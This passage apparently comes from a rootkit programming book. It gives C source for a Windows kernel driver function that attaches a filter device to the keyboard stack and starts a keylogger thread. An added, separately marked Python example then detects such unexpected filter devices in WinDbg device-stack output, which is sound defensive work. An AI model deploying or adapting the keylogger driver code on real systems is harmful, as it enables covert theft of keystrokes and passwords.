filterManager.c


Only the keyManager include statement and the function insertKeyboardFilter were added to filterManager.c:

  #include "keyManager.h"

  NTSTATUS insertKeyboardFilter(PDRIVER_OBJECT pDriverObject,
                                PDEVICE_OBJECT* ppOldDevice,
                                PDEVICE_OBJECT* ppNewDevice,
                                wchar_t* deviceName)
  {
      NTSTATUS status = STATUS_SUCCESS;
      UNICODE_STRING unicodeName = { 0 };

      // Create a new device
      status = IoCreateDevice( pDriverObject,
                               0,
                               NULL,
                               FILE_DEVICE_KEYBOARD,
                               0,
                               FALSE,
                               ppNewDevice );
      if( !NT_SUCCESS( status ) )
          return status;

      // Initialize the new device
      ((PDEVICE_OBJECT)(*ppNewDevice))->Flags |= (DO_BUFFERED_IO | DO_POWER_PAGABLE);
      ((PDEVICE_OBJECT)(*ppNewDevice))->Flags &= ~DO_DEVICE_INITIALIZING;

      // Attach the new device
      RtlInitUnicodeString( &unicodeName, deviceName );
      status = IoAttachDevice( *ppNewDevice,
                               &unicodeName,
                               ppOldDevice );

      // Prevent unload if load failed
      if( !NT_SUCCESS( status ) )
      {
          IoDeleteDevice( *ppNewDevice );
          *ppNewDevice = NULL;
      }
      else
      {
          // Prepare the keylogging thread
          StartKeylogger( pDriverObject );
      }
      return status;
  }

This function is very similar to the network filter insertion function, insertNetworkFilter. The differences are that the new device is created as type FILE_DEVICE_KEYBOARD, it is attached by name to the existing keyboard device with IoAttachDevice, and the device flags differ (DO_BUFFERED_IO and DO_POWER_PAGABLE are set before DO_DEVICE_INITIALIZING is cleared).
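From the defender's side, the attach described above leaves a visible trace: an extra, unnamed device object from an unfamiliar driver sitting on top of the keyboard class device in the device stack, which WinDbg's `!devstack` command lists top-most first. The following is an added example, not code from the book or from the driver it describes: it parses a `!devstack`-style dump and flags any device above the class device whose driver is outside a known-good allowlist or which has no object name. The dump, the allowlist and the driver name `\Driver\filtMgrX` are all constructed for illustration.

```python
"""Heuristic check of a keyboard device stack for unexpected filter devices.

Added example (not from the book): parses WinDbg-style `!devstack` output
and flags devices attached above the keyboard class device that belong to
drivers outside a known-good allowlist, or that carry no object name.
The sample dump below is constructed, not captured from a real system.
"""
import re
from dataclasses import dataclass

# Drivers normally present in a PS/2 or USB keyboard stack. This allowlist
# is an assumption for the example; a defender would tune it per fleet.
KNOWN_KEYBOARD_DRIVERS = {
    r"\Driver\kbdclass", r"\Driver\i8042prt", r"\Driver\kbdhid",
    r"\Driver\HidUsb", r"\Driver\ACPI", r"\Driver\USBHUB3", r"\Driver\USBXHCI",
}
CLASS_DRIVER = r"\Driver\kbdclass"

# Constructed `!devstack` dump: a nameless device from an unfamiliar driver
# (\Driver\filtMgrX, a made-up name) sits on top of KeyboardClass0, which is
# where IoAttachDevice places a filter attached to that device by name.
SAMPLE_DEVSTACK = """\
  !DevObj           !DrvObj           !DevExt           ObjectName
  ffff9d0c1e2a3c40  \\Driver\\filtMgrX  ffff9d0c1e2a3d90
  ffff9d0c1c4d7a90  \\Driver\\kbdclass  ffff9d0c1c4d7be0  KeyboardClass0
> ffff9d0c1b0c5060  \\Driver\\i8042prt  ffff9d0c1b0c51b0
  ffff9d0c1a8b4e30  \\Driver\\ACPI      ffff9d0c1a8b4f80  00000071
!DevNode ffff9d0c1a7f7d30 :
  DeviceInst is "ACPI\\PNP0303\\4&3b0c0d9e&0"
  ServiceName is "i8042prt"
"""


@dataclass
class StackEntry:
    devobj: str
    driver: str
    devext: str
    name: str  # empty string for an unnamed device object


# One stack row: optional ">" marker, DEVICE_OBJECT address, driver object
# name, device extension address, and an optional object name.
ROW = re.compile(
    r"^>?\s*([0-9a-fA-F]{8,16})\s+(\S+)\s+([0-9a-fA-F]{8,16})\s*(\S*)\s*$"
)


def parse_devstack(text):
    """Return stack entries top-most first, in the order WinDbg prints them."""
    entries = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            entries.append(StackEntry(*m.groups()))
    return entries


def suspicious_filters(entries):
    """Devices above the class device that are unnamed or from unknown drivers.

    Returns a list of (devobj, driver, [reasons]) tuples.
    """
    findings = []
    for e in entries:
        if e.driver == CLASS_DRIVER:
            break  # everything below the class device is the port/bus side
        reasons = []
        if e.driver not in KNOWN_KEYBOARD_DRIVERS:
            reasons.append("driver not in allowlist")
        if not e.name:
            reasons.append("unnamed device object")
        if reasons:
            findings.append((e.devobj, e.driver, reasons))
    return findings


if __name__ == "__main__":
    for devobj, driver, reasons in suspicious_filters(parse_devstack(SAMPLE_DEVSTACK)):
        print(f"{devobj} {driver}: {', '.join(reasons)}")
```

The check stops at the class driver on purpose: port and bus devices below it are routinely unnamed, so only the filter region above kbdclass is judged. A legitimate third-party filter will also be flagged here, which is the intended behaviour of an allowlist; the finding is a prompt to identify the driver, not a verdict.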




Professional Rootkits (Programmer to Programmer)
ISBN: 0470101547
Year: 2007
Pages: 229
Authors: Ric Vieler
